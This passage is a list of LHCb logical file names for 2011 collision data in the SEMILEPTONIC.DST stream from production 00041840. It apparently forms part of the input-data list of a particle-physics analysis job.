'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002588_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046910_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014210_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034479_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033731_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012446_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049618_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068055_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053114_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059883_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068956_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016558_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000887_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017281_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028309_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000056_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066166_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034306_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000299_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043049_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057713_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020815_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064180_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026466_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031385_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058255_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021794_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041841_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062050_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039890_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058051_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052334_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041178_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062555_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066784_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024422_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005954_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017696_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015311_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060115_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001981_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021930_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032052_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062163_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048263_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056731_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052360_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056603_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000445_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028404_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020560_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011519_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010213_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051639_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068642_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062376_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036043_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029965_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065612_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062736_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010142_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067917_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065227_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069259_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046150_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023743_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032892_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010696_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038317_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069406_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058837_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000489_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068914_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001256_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040227_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018674_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068671_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011601_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066775_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046487_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023636_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039623_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010318_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015666_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017623_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008647_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059591_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015406_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062426_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015947_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036628_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028892_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016405_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046863_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060222_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012362_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026065_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018242_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017573_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052627_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009230_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037666_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067578_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051784_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064884_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010723_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046326_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067897_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044812_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032893_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034414_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062516_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068601_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055943_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067422_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002099_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032051_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028292_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043820_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027237_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032453_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002211_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051169_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028692_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062667_1.semileptonic.dst',
